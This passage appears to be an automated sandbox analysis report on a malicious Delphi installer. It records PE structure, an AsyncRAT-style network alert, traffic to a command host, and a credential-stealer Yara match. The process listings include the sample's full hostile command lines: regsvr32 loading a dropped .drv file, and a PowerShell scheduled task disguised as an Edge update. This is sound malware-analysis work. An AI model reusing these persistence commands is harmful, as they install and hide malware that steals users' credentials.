                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x200000x18.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x1e3500x24c.idata
                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                            .text0x10000x143f80x14400c9bb3afc1ceaaa31127ccfa204c657efFalse0.5487316743827161data6.482216817915366IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                            .itext0x160000xbe80xc001ba5adf2e1058c0460dcc814ba86fb32False0.6246744791666666data6.005798728198158IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                            .data0x170000xd9c0xe00d5b22eff9e08edaa95f493c1a71158c0False0.2924107142857143data2.669288666959085IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .bss0x180000x574c0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .idata0x1e0000xf9e0x1000b47eaca4c149ee829de76a342b5560d5False0.35595703125data4.9677831942996935IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .tls0x1f0000x80x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .rdata0x200000x180x2003746f5876803f8f30db5bb2deb8772aeFalse0.05078125data0.190488766434666IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .rsrc0x210000x102d40x10400fe2478415e1581a70914dfc06f95f5e6False0.30955528846153846data5.124529477041404IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                            RT_ICON0x2150c0x668Device independent bitmap graphic, 48 x 96 x 4, image size 0EnglishUnited States0.23902439024390243
                                                                            RT_ICON0x21b740x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishUnited States0.38306451612903225
                                                                            RT_ICON0x21e5c0x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishUnited States0.597972972972973
                                                                            RT_ICON0x21f840xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishUnited States0.6084754797441365
                                                                            RT_ICON0x22e2c0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishUnited States0.8172382671480144
                                                                            RT_ICON0x236d40x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishUnited States0.7276011560693642
                                                                            RT_ICON0x23c3c0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.4179460580912863
                                                                            RT_ICON0x261e40x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.6719043151969981
                                                                            RT_ICON0x2728c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.8315602836879432
                                                                            RT_STRING0x276f40xc4data0.5969387755102041
                                                                            RT_STRING0x277b80xccdata0.6225490196078431
                                                                            RT_STRING0x278840x174data0.5510752688172043
                                                                            RT_STRING0x279f80x39cdata0.34523809523809523
                                                                            RT_STRING0x27d940x34cdata0.4218009478672986
                                                                            RT_STRING0x280e00x294data0.4106060606060606
                                                                            RT_RCDATA0x283740x82e8dataEnglishUnited States0.11261637622344235
                                                                            RT_RCDATA0x3065c0x10data1.5
                                                                            RT_RCDATA0x3066c0x1a0data0.8149038461538461
                                                                            RT_RCDATA0x3080c0x2cdata1.1818181818181819
                                                                            RT_GROUP_ICON0x308380x84dataEnglishUnited States0.6363636363636364
                                                                            RT_VERSION0x308bc0x4b8COM executable for DOSEnglishUnited States0.2855960264900662
                                                                            RT_MANIFEST0x30d740x560XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.4251453488372093
                                                                            DLLImport
                                                                            oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                            advapi32.dllRegQueryValueExW, RegOpenKeyExW, RegCloseKey
                                                                            user32.dllGetKeyboardType, LoadStringW, MessageBoxA, CharNextW
                                                                            kernel32.dllGetACP, Sleep, VirtualFree, VirtualAlloc, GetSystemInfo, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenW, lstrcpynW, LoadLibraryExW, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLocaleInfoW, GetCommandLineW, FreeLibrary, FindFirstFileW, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle, CloseHandle
                                                                            kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleW
                                                                            user32.dllCreateWindowExW, TranslateMessage, SetWindowLongW, PeekMessageW, MsgWaitForMultipleObjects, MessageBoxW, LoadStringW, GetSystemMetrics, ExitWindowsEx, DispatchMessageW, DestroyWindow, CharUpperBuffW, CallWindowProcW
                                                                            kernel32.dllWriteFile, WideCharToMultiByte, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, SizeofResource, SignalObjectAndWait, SetLastError, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, RemoveDirectoryW, ReadFile, MultiByteToWideChar, LockResource, LoadResource, LoadLibraryW, LeaveCriticalSection, InitializeCriticalSection, GetWindowsDirectoryW, GetVersionExW, GetUserDefaultLangID, GetThreadLocale, GetSystemInfo, GetStdHandle, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLocaleInfoW, GetLocalTime, GetLastError, GetFullPathNameW, GetFileSize, GetFileAttributesW, GetExitCodeProcess, GetEnvironmentVariableW, GetDiskFreeSpaceW, GetDateFormatW, GetCurrentProcess, GetCommandLineW, GetCPInfo, InterlockedExchange, InterlockedCompareExchange, FreeLibrary, FormatMessageW, FindResourceW, EnumCalendarInfoW, EnterCriticalSection, DeleteFileW, DeleteCriticalSection, CreateProcessW, CreateFileW, CreateEventW, CreateDirectoryW, CompareStringW, CloseHandle
                                                                            advapi32.dllRegQueryValueExW, RegOpenKeyExW, RegCloseKey, OpenProcessToken, LookupPrivilegeValueW
                                                                            comctl32.dllInitCommonControls
                                                                            kernel32.dllSleep
                                                                            advapi32.dllAdjustTokenPrivileges
                                                                            oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                                                                            Language of compilation systemCountry where language is spokenMap
                                                                            EnglishUnited States
                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                            2025-01-02T14:08:46.826838+01002035595ET MALWARE Generic AsyncRAT Style SSL Cert1144.202.34.11256001192.168.11.2049715TCP
                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Jan 2, 2025 14:08:46.232553005 CET4971556001192.168.11.20144.202.34.112
                                                                            Jan 2, 2025 14:08:46.362107038 CET5600149715144.202.34.112192.168.11.20
                                                                            Jan 2, 2025 14:08:46.362247944 CET4971556001192.168.11.20144.202.34.112
                                                                            Jan 2, 2025 14:08:46.368822098 CET4971556001192.168.11.20144.202.34.112
                                                                            Jan 2, 2025 14:08:46.552822113 CET5600149715144.202.34.112192.168.11.20
                                                                            Jan 2, 2025 14:08:46.552985907 CET4971556001192.168.11.20144.202.34.112
                                                                            Jan 2, 2025 14:08:46.690830946 CET5600149715144.202.34.112192.168.11.20
                                                                            Jan 2, 2025 14:08:46.690875053 CET5600149715144.202.34.112192.168.11.20
                                                                            Jan 2, 2025 14:08:46.691028118 CET4971556001192.168.11.20144.202.34.112
                                                                            Jan 2, 2025 14:08:46.695679903 CET4971556001192.168.11.20144.202.34.112
                                                                            Jan 2, 2025 14:08:46.826838017 CET5600149715144.202.34.112192.168.11.20
                                                                            Jan 2, 2025 14:08:46.880090952 CET4971556001192.168.11.20144.202.34.112
                                                                            Jan 2, 2025 14:08:50.261701107 CET4971556001192.168.11.20144.202.34.112
                                                                            Jan 2, 2025 14:08:50.443298101 CET5600149715144.202.34.112192.168.11.20
                                                                            Jan 2, 2025 14:08:50.443458080 CET4971556001192.168.11.20144.202.34.112
                                                                            Jan 2, 2025 14:08:50.615226030 CET5600149715144.202.34.112192.168.11.20
                                                                            Jan 2, 2025 14:09:12.303415060 CET4971556001192.168.11.20144.202.34.112
                                                                            Jan 2, 2025 14:09:12.474508047 CET5600149715144.202.34.112192.168.11.20
                                                                            Jan 2, 2025 14:09:12.474656105 CET4971556001192.168.11.20144.202.34.112
                                                                            Jan 2, 2025 14:09:12.605123997 CET5600149715144.202.34.112192.168.11.20
                                                                            Jan 2, 2025 14:09:12.655550003 CET4971556001192.168.11.20144.202.34.112
                                                                            Jan 2, 2025 14:09:12.784842014 CET5600149715144.202.34.112192.168.11.20
                                                                            Jan 2, 2025 14:09:12.827424049 CET4971556001192.168.11.20144.202.34.112
                                                                            Jan 2, 2025 14:09:12.893112898 CET4971556001192.168.11.20144.202.34.112
                                                                            Jan 2, 2025 14:09:13.068484068 CET5600149715144.202.34.112192.168.11.20
                                                                            Jan 2, 2025 14:09:13.068698883 CET4971556001192.168.11.20144.202.34.112
                                                                            Jan 2, 2025 14:09:13.240334988 CET5600149715144.202.34.112192.168.11.20
                                                                            Jan 2, 2025 14:09:13.506438971 CET5600149715144.202.34.112192.168.11.20
                                                                            Jan 2, 2025 14:09:13.561585903 CET4971556001192.168.11.20144.202.34.112
                                                                            Jan 2, 2025 14:09:13.691083908 CET5600149715144.202.34.112192.168.11.20
                                                                            Jan 2, 2025 14:09:13.733429909 CET4971556001192.168.11.20144.202.34.112
                                                                            Jan 2, 2025 14:09:37.244111061 CET4971556001192.168.11.20144.202.34.112
                                                                            Jan 2, 2025 14:09:37.428252935 CET5600149715144.202.34.112192.168.11.20
                                                                            Jan 2, 2025 14:09:37.428437948 CET4971556001192.168.11.20144.202.34.112
                                                                            Jan 2, 2025 14:09:37.558715105 CET5600149715144.202.34.112192.168.11.20
                                                                            Jan 2, 2025 14:09:37.603097916 CET4971556001192.168.11.20144.202.34.112
                                                                            Jan 2, 2025 14:09:37.732326031 CET5600149715144.202.34.112192.168.11.20
                                                                            Jan 2, 2025 14:09:37.733565092 CET4971556001192.168.11.20144.202.34.112
                                                                            Jan 2, 2025 14:09:37.912255049 CET5600149715144.202.34.112192.168.11.20
                                                                            Jan 2, 2025 14:09:37.912426949 CET4971556001192.168.11.20144.202.34.112
                                                                            Jan 2, 2025 14:09:38.084132910 CET5600149715144.202.34.112192.168.11.20
                                                                            Jan 2, 2025 14:09:40.522288084 CET5600149715144.202.34.112192.168.11.20
                                                                            Jan 2, 2025 14:09:40.571211100 CET4971556001192.168.11.20144.202.34.112
                                                                            Jan 2, 2025 14:09:40.701056957 CET5600149715144.202.34.112192.168.11.20
                                                                            Jan 2, 2025 14:09:40.743068933 CET4971556001192.168.11.20144.202.34.112
                                                                            Jan 2, 2025 14:10:02.245826006 CET4971556001192.168.11.20144.202.34.112
                                                                            Jan 2, 2025 14:10:02.428184986 CET5600149715144.202.34.112192.168.11.20
                                                                            Jan 2, 2025 14:10:02.428296089 CET4971556001192.168.11.20144.202.34.112
                                                                            Jan 2, 2025 14:10:02.558981895 CET5600149715144.202.34.112192.168.11.20
                                                                            Jan 2, 2025 14:10:02.613110065 CET4971556001192.168.11.20144.202.34.112
                                                                            Jan 2, 2025 14:10:02.742500067 CET5600149715144.202.34.112192.168.11.20
                                                                            Jan 2, 2025 14:10:02.744044065 CET4971556001192.168.11.20144.202.34.112
                                                                            Jan 2, 2025 14:10:02.927911997 CET5600149715144.202.34.112192.168.11.20
                                                                            Jan 2, 2025 14:10:02.928076029 CET4971556001192.168.11.20144.202.34.112
                                                                            Jan 2, 2025 14:10:03.099744081 CET5600149715144.202.34.112192.168.11.20
                                                                            Jan 2, 2025 14:10:07.537826061 CET5600149715144.202.34.112192.168.11.20
                                                                            Jan 2, 2025 14:10:07.580729008 CET4971556001192.168.11.20144.202.34.112
                                                                            Jan 2, 2025 14:10:07.710082054 CET5600149715144.202.34.112192.168.11.20
                                                                            Jan 2, 2025 14:10:07.752602100 CET4971556001192.168.11.20144.202.34.112
                                                                            Jan 2, 2025 14:10:08.218152046 CET4971556001192.168.11.20144.202.34.112
                                                                            Jan 2, 2025 14:10:08.396615982 CET5600149715144.202.34.112192.168.11.20
                                                                            Jan 2, 2025 14:10:08.396719933 CET4971556001192.168.11.20144.202.34.112
                                                                            Jan 2, 2025 14:10:08.527384996 CET5600149715144.202.34.112192.168.11.20
                                                                            Jan 2, 2025 14:10:08.580543041 CET4971556001192.168.11.20144.202.34.112
                                                                            Jan 2, 2025 14:10:08.710041046 CET5600149715144.202.34.112192.168.11.20
                                                                            Jan 2, 2025 14:10:08.710722923 CET4971556001192.168.11.20144.202.34.112
                                                                            Jan 2, 2025 14:10:08.881006002 CET5600149715144.202.34.112192.168.11.20
                                                                            Jan 2, 2025 14:10:08.881196022 CET4971556001192.168.11.20144.202.34.112
                                                                            Jan 2, 2025 14:10:09.052891016 CET5600149715144.202.34.112192.168.11.20
                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                            Jan 2, 2025 14:08:33.966959953 CET1.1.1.1192.168.11.200x9904No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                            Jan 2, 2025 14:08:33.966959953 CET1.1.1.1192.168.11.200x9904No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false

                                                                            Click to jump to process

                                                                            Click to jump to process

                                                                            Click to dive into process behavior distribution

                                                                            Click to jump to process

                                                                            Target ID:0
                                                                            Start time:08:08:00
                                                                            Start date:02/01/2025
                                                                            Path:C:\Users\user\Desktop\8n26gvrXUM.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\8n26gvrXUM.exe"
                                                                            Imagebase:0x400000
                                                                            File size:1'479'422 bytes
                                                                            MD5 hash:C6F9F0EC394A72FB302EFBCF74DA2EA7
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:Borland Delphi
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            Target ID:1
                                                                            Start time:08:08:00
                                                                            Start date:02/01/2025
                                                                            Path:C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmp
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmp" /SL5="$103F0,1083099,161792,C:\Users\user\Desktop\8n26gvrXUM.exe"
                                                                            Imagebase:0x400000
                                                                            File size:1'181'184 bytes
                                                                            MD5 hash:BCC236A3921E1388596A42B05686FF5E
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:Borland Delphi
                                                                            Antivirus matches:
                                                                            • Detection: 3%, ReversingLabs
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            Target ID:3
                                                                            Start time:08:08:01
                                                                            Start date:02/01/2025
                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"cmd.exe" /C timeout /T 3 & "C:\Users\user\Desktop\8n26gvrXUM.exe" /VERYSILENT /SUPPRESSMSGBOXES
                                                                            Imagebase:0x30000
                                                                            File size:236'544 bytes
                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:4
                                                                            Start time:08:08:01
                                                                            Start date:02/01/2025
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff6fe510000
                                                                            File size:875'008 bytes
                                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:5
                                                                            Start time:08:08:01
                                                                            Start date:02/01/2025
                                                                            Path:C:\Windows\SysWOW64\timeout.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:timeout /T 3
                                                                            Imagebase:0xba0000
                                                                            File size:25'088 bytes
                                                                            MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:6
                                                                            Start time:08:08:04
                                                                            Start date:02/01/2025
                                                                            Path:C:\Users\user\Desktop\8n26gvrXUM.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\8n26gvrXUM.exe" /VERYSILENT /SUPPRESSMSGBOXES
                                                                            Imagebase:0x400000
                                                                            File size:1'479'422 bytes
                                                                            MD5 hash:C6F9F0EC394A72FB302EFBCF74DA2EA7
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:Borland Delphi
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            Target ID:7
                                                                            Start time:08:08:04
                                                                            Start date:02/01/2025
                                                                            Path:C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp" /SL5="$30432,1083099,161792,C:\Users\user\Desktop\8n26gvrXUM.exe" /VERYSILENT /SUPPRESSMSGBOXES
                                                                            Imagebase:0x400000
                                                                            File size:1'181'184 bytes
                                                                            MD5 hash:BCC236A3921E1388596A42B05686FF5E
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:Borland Delphi
                                                                            Antivirus matches:
                                                                            • Detection: 3%, ReversingLabs
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            Target ID:8
                                                                            Start time:08:08:04
                                                                            Start date:02/01/2025
                                                                            Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"regsvr32.exe" /s /i:SYNC "C:\Users\user\AppData\Roaming\\netapi32_1.drv"
                                                                            Imagebase:0x940000
                                                                            File size:20'992 bytes
                                                                            MD5 hash:878E47C8656E53AE8A8A21E927C6F7E0
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:9
                                                                            Start time:08:08:04
                                                                            Start date:02/01/2025
                                                                            Path:C:\Windows\System32\regsvr32.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline: /s /i:SYNC "C:\Users\user\AppData\Roaming\\netapi32_1.drv"
                                                                            Imagebase:0x7ff7b33d0000
                                                                            File size:25'088 bytes
                                                                            MD5 hash:B0C2FA35D14A9FAD919E99D9D75E1B9E
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:10
                                                                            Start time:08:08:04
                                                                            Start date:02/01/2025
                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv' }) { exit 0 } else { exit 1 }"
                                                                            Imagebase:0x7ff74c1f0000
                                                                            File size:452'608 bytes
                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:11
                                                                            Start time:08:08:04
                                                                            Start date:02/01/2025
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff6fe510000
                                                                            File size:875'008 bytes
                                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:12
                                                                            Start time:08:08:10
                                                                            Start date:02/01/2025
                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{5AA590E8-E6D2-49AB-E5B8-6BCEE32CF7C9}' -Description 'MicrosoftEdgeUpdateTaskMachineUA' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0) -RunLevel Highest"
                                                                            Imagebase:0x7ff74c1f0000
                                                                            File size:452'608 bytes
                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            Target ID:13
                                                                            Start time:08:08:10
                                                                            Start date:02/01/2025
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff6fe510000
                                                                            File size:875'008 bytes
                                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            Target ID:14
                                                                            Start time:08:08:12
                                                                            Start date:02/01/2025
                                                                            Path:C:\Windows\System32\regsvr32.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\regsvr32.EXE /S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv
                                                                            Imagebase:0x7ff7b33d0000
                                                                            File size:25'088 bytes
                                                                            MD5 hash:B0C2FA35D14A9FAD919E99D9D75E1B9E
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.2137187188.00000000033D8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            Has exited:false

                                                                            Target ID:15
                                                                            Start time:08:08:13
                                                                            Start date:02/01/2025
                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv' }) { exit 0 } else { exit 1 }"
                                                                            Imagebase:0x7ff74c1f0000
                                                                            File size:452'608 bytes
                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            Target ID:16
                                                                            Start time:08:08:13
                                                                            Start date:02/01/2025
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff6fe510000
                                                                            File size:875'008 bytes
                                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            Target ID:17
                                                                            Start time:08:08:32
                                                                            Start date:02/01/2025
                                                                            Path:C:\Windows\System32\svchost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                            Imagebase:0x7ff6dd940000
                                                                            File size:57'360 bytes
                                                                            MD5 hash:F586835082F632DC8D9404D83BC16316
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:false

                                                                            Reset < >
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.928727861.0000000002391000.00000020.00000001.01000000.00000006.sdmp, Offset: 02390000, based on PE: true
                                                                              • Associated: 00000001.00000002.928699877.0000000002390000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000001.00000002.928756353.0000000002393000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_2390000_8n26gvrXUM.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: invalid bit length repeat$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
                                                                              • API String ID: 0-3031085480
                                                                              • Opcode ID: 970dd36a4f6eb9e2465c30397e50ad228eb4d7f0cb7f81d4f09e3288209c7f94
                                                                              • Instruction ID: 6769e830417df4758dde5a2f585a73f55d705d06c80448adfc8f41264e718c4d
                                                                              • Opcode Fuzzy Hash: 970dd36a4f6eb9e2465c30397e50ad228eb4d7f0cb7f81d4f09e3288209c7f94
                                                                              • Instruction Fuzzy Hash: 556269B56087059FCB08DF18C8E066ABBE1FF89304F044A6DE886CB74AE775D945CB81
                                                                              Strings
                                                                              • invalid distance too far back, xrefs: 0239163B
                                                                              • invalid distance code, xrefs: 02391650
                                                                              • invalid literal/length code, xrefs: 0239166A
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.928727861.0000000002391000.00000020.00000001.01000000.00000006.sdmp, Offset: 02390000, based on PE: true
                                                                              • Associated: 00000001.00000002.928699877.0000000002390000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000001.00000002.928756353.0000000002393000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_2390000_8n26gvrXUM.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: invalid distance code$invalid distance too far back$invalid literal/length code
                                                                              • API String ID: 0-3255898291
                                                                              • Opcode ID: dc5778d7a03275b02984806eb66bd5b3500a2f5f1a2f917e5dbf5e18d15388b1
                                                                              • Instruction ID: 2b67994601ef2566fe81f0b20a5e4e8e9d4b1fb2327152dce6a5b16f68ce451d
                                                                              • Opcode Fuzzy Hash: dc5778d7a03275b02984806eb66bd5b3500a2f5f1a2f917e5dbf5e18d15388b1
                                                                              • Instruction Fuzzy Hash: B4E190716083868FCB08CF2CC590669FBE1EB86304F184A6DE8DAD7342E775D90ACB51

                                                                              Execution Graph

                                                                              Execution Coverage:3.8%
                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                              Signature Coverage:0%
                                                                              Total number of Nodes:23
                                                                              Total number of Limit Nodes:0
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 00000009.00000002.1165802210.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1165995133.00007FFD34995000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166025328.00007FFD34996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166165595.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166193995.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166222345.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166251588.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: CloseHandle$EnvironmentErrorFreeLastStringsmemcpy
